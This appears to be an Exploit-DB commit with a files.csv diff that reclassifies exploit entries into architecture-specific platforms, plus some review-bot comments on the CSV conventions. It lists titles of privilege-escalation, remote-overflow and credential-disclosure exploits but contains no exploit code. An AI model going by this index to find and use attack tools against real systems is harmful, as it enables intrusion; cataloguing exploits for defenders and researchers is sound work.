DB: 2017-02-01

65 new exploits

Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow

Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow

PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow

32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)

Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service

ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)
ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)

Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service

VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read

Samba < 3.6.2 (x86) - Denial of Serviec (PoC)

Adobe Flash - Bad Dereference at 0x23c on Linux x64
Adobe Flash (Linux x64) - Bad Dereference at 0x23c

Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited

Core FTP Server 32-bit Build 587 - Heap Overflow

Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)
Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)

RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation
RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation

Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation
Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)
Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation
Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation

Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure
Rocks Clusters 4.1 - (umount-loop) Privilege Escalation
Rocks Clusters 4.1 - (mount-loop) Privilege Escalation
Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation
Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation

PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure

Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation

Postfix 2.6-20080814 - (symlink) Privilege Escalation
Postfix 2.6-20080814 - 'symlink' Privilege Escalation

Oracle Database Vault - ptrace(2) Privilege Escalation
Oracle Database Vault - 'ptrace(2)' Privilege Escalation

Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation

GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)
GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation

Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)

Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)
Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)

VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)

PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation
PolicyKit polkit-1 < 0.101 - Privilege Escalation
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail 8.10.1) Capabilities Privilege Escalation (2)
QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation
QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation

Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure

Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)
Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)

MySQL 3.23.x - mysqld Privilege Escalation
MySQL 3.23.x - 'mysqld' Privilege Escalation
Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation
MTools 3.9.x - MFormat Privilege Escalation
Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation
MTools 3.9.x - 'MFormat' Privilege Escalation

Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)

sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass
sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation

Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)

ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation
ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation

Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)

LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure

Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation

Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)

Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation

Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)

TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure

Linux Kernel 3.13 - Privilege Escalation PoC (SGID)
Linux Kernel 3.13 -  (SGID) Privilege Escalation (PoC)

OSSEC 2.8 - hosts.deny Privilege Escalation
OSSEC 2.8 - 'hosts.deny' Privilege Escalation

Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition
Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation
Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)
Linux espfix64 -  (Nested NMIs Interrupting) Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)

RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation
RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation

MySQL 5.5.45 (x64) - Local Credentials Disclosure

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation

Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)
Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)

Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak

Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation

Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)

Viscosity 1.6.7 - Privilege Escalation

BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution
BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution

Solaris /bin/login (SPARC/x86) - Remote Code Execution

gpsdrive 2.09 (x86) - (friendsd2) Remote Format String

PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)

dproxy-nexgen (Linux/x86) - Buffer Overflow
dproxy-nexgen (Linux x86) - Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)

Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)

AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)

32bit FTP Client - Stack Buffer Overflow (Metasploit)

Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)
Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)

Apache (Windows x86) - Chunked Encoding (Metasploit)

PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)

CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)
Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)

Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)

Webmin 0.x - RPC Function Privilege Escalation
Webmin 0.x - 'RPC' Function Privilege Escalation

Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit

Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit
Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit

technote 7.2 - Remote File Inclusion
Technote 7.2 - Remote File Inclusion
JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access
JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass
JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting
Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access
Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass
Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting

JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection
Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection

JAWS Glossary 0.4/0.5 - Cross-Site Scripting
Jaws Glossary 0.4/0.5 - Cross-Site Scripting

JAWS 0.x - Remote File Inclusion
Jaws 0.x - Remote File Inclusion

FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities
Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities

Multiple Netgear Routers - Password Disclosure
Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
Netman 204 - Backdoor Account / Password Reset
Offensive Security 2017-02-01 05:01:19 +00:00
parent bf6526a40b
commit 1a4e6f50a9
70 changed files with 574 additions and 135 deletions

204
files.csv

@ -356,7 +356,7 @@ id,file,description,date,author,platform,type,port
1967,platforms/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol Driver Remote Buffer Overflow",2006-06-30,Preddy,windows,dos,0
1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0
1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0
1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0
1977,platforms/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos,0
1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0
1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0
1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0
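Review bot: the row for 1977 changes both the `file` path (platforms/windows/dos/1977.cpp to platforms/win_x86/dos/1977.cpp) and the `platform` column to `win_x86`, so the actual file move has to land in the same commit or the CSV will point at a path that does not exist; the summary reports 70 changed files, but the move is not visible in this hunk, so confirm it before merging. Anything that filters rows on `platform == windows` also stops matching this entry once the token changes, so the new token set (`windows` alongside `win_x86`) should be written down where the CSV columns are documented.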
@ -531,7 +531,7 @@ id,file,description,date,author,platform,type,port
3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos,0
3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos,0
3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0
3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,windows,dos,0
3527,platforms/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,win_x86,dos,0
3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - (Digest domain) Denial of Service",2007-03-21,MADYNES,hardware,dos,0
3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos,0
3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0
@ -622,12 +622,12 @@ id,file,description,date,author,platform,type,port
4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0
4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0
4289,platforms/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0
4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0
4293,platforms/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,win_x86,dos,0
4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0
4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,windows,dos,0
4318,platforms/win_x86/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,win_x86,dos,0
4319,platforms/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0
4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
@ -1044,7 +1044,7 @@ id,file,description,date,author,platform,type,port
8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos,0
8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",windows,dos,0
8611,platforms/win_x86/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",win_x86,dos,0
8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos,0
8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,windows,dos,0
8644,platforms/windows/dos/8644.pl,"ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0
@ -1183,7 +1183,7 @@ id,file,description,date,author,platform,type,port
9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0
9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0
9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0
9606,platforms/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos,0
9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0
@ -1243,7 +1243,7 @@ id,file,description,date,author,platform,type,port
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
10102,platforms/windows/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80
10102,platforms/win_x86/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",win_x86,dos,80
10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0
10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21
10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
@ -1520,7 +1520,7 @@ id,file,description,date,author,platform,type,port
12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0
12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0
12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0
12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
12457,platforms/win_x86/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,win_x86,dos,0
12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
@ -1533,7 +1533,7 @@ id,file,description,date,author,platform,type,port
12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0
12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial of Service",2010-05-09,"Yakir Wizman",windows,dos,0
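Review bot: 12529 only rewords "x32/x64" to "x86/x64" and keeps `platform` at `windows`, unlike the single-architecture rows elsewhere in this diff that move to `win_x86`. Keeping the generic platform for a multi-architecture entry is the right call, but this is the first place that convention shows up, so a sentence in the commit message stating that multi-arch entries stay on the generic platform would spare the next reviewer the question.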
@ -4244,7 +4244,7 @@ id,file,description,date,author,platform,type,port
33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0
33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 - WebDAV Format String",2010-01-22,Intevydis,multiple,dos,0
33571,platforms/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0
33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0
33585,platforms/lin_x86-64/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",lin_x86-64,dos,0
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0
33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0
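Review bot: 33585 introduces `lin_x86-64` as a platform value and the matching platforms/lin_x86-64/dos/ directory, while the neighbouring rows (33571, 33607) stay on `linux`. Any consumer that selects Linux entries with an exact match on `linux` now silently misses this row; either the documented platform list needs the new token, or the rename should also state that `linux` is no longer the umbrella for all Linux entries.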
@ -4388,7 +4388,7 @@ id,file,description,date,author,platform,type,port
35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0
35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0
35182,platforms/win_x86/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,win_x86,dos,0
35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0
35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0
35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0
@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,linux,dos,0
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
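Review bot: the rewritten row for 36741 keeps the typo "Denial of Serviec" in the description. Since the line is being touched anyway, correct it to "Denial of Service" here and in the matching title in the commit message, so the two stay in sync.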
@ -4642,7 +4642,7 @@ id,file,description,date,author,platform,type,port
37865,platforms/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
37866,platforms/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0
37867,platforms/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0
37868,platforms/linux/dos/37868.txt,"Adobe Flash - Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0
37868,platforms/lin_x86-64/dos/37868.txt,"Adobe Flash (Linux x64) - Bad Dereference at 0x23c",2015-08-19,"Google Security Research",lin_x86-64,dos,0
37869,platforms/linux/dos/37869.txt,"Adobe Flash - Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0
37870,platforms/linux/dos/37870.txt,"Adobe Flash - Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0
37871,platforms/multiple/dos/37871.txt,"Adobe Flash - swapDepths Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
